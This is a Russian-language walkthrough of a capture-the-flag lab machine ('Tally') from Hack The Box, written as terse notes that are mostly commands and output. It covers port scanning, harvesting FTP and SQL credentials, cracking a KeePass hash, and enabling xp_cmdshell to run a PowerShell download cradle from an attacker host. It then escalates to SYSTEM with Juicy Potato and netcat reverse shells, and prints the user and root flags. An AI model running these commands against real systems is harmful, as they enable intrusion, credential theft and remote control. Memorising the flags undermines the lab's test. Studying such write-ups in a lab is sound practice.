Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.59 -t Full
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-09T12:19:03
|_Not valid after: 2051-06-09T12:19:03
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m09s, deviation: 0s, median: 4m09s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-09T12:31:01
|_ start_date: 2021-06-09T12:18:38
Microsoft Sharepoint:
http://10.10.10.59/_layouts/viewlsts.aspx
Креды для FTP:
http://10.10.10.59/Shared%20Documents/ftp-details.docx>
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
ftp_user:UTDRSCH53c"$6hys
FTP
Скачаем все файлы с FTP:
$ cat ftp/_/User/Sarah/notes.txt
install sharepoint, replace orchard cms
uninstall sql server 2016 (not done yet)
Брутфорс
База Keepass ftp/_/User/Tim/Files/tim.kdbx
.
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
=> simplementeyo
=> windows tally acct шараFinance:Acc0unting
cisco:cisco123
pdf writer:64257-56525-54257-54734
$ smbclient -L //10.10.10.59 -U Finance
Sharename Type Comment
--------- ---- -------
ACCT Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
$ cat ftp/_/User/Tim/Project/Log/do\ to.txt]
To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass
Reverse Shell
$ smb: \zz_Migration\Binaries\New folder> get tester.exe
$ strings tester.exe | grep db
db: orcharddb
uid: sa
pwd: GWE3V65#6KFH93@4GWTG2G
$ python server and nishang shell and nc -lvnp 1234
sql connection:
$ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell',1
go
reconfigure
go
xp_cmdshell "powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"
go
Флаг пользователя
PS C:\users\sarah\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2
Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\sarah\desktop> type user.txt
be72362e8dffeca2b42406d5d1c74bb1
Повышение привилегий
> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
PS C:\users\sarah\desktop> type todo.txt
done:
install updates
check windows defender enabled
outstanding:
update intranet design
update server inventory
=> используются не самый последние обновления и нельзя использовать имя cmd.exe
.
Публичный эксплоит
https://www.exploit-db.com/exploits/42020
Переименовать cmd.exe
в writeup.exe
> whoami /priv
SeImpersonatePrivilege Impersonate a client after authentication Enabled
=> juicy potato
> certutil -urlcache -f "http://10.10.14.2/nc.exe" nc.exe
> certutil -urlcache -f "http://10.10.14.2/jp.exe" jp.exe
nc -lnvp 1235
.\nc.exe 10.10.14.2 1235 -e cmd.exe
nc -lnvp 1236
(взять идентификатор отсюда https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard/)>
jp.exe -l 4321 -p C:\Users\Sarah\Desktop\nc.exe -a "10.10.14.2 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}
Флаг суперпользователя
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2
Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
608bb707348105911c8991108e523eda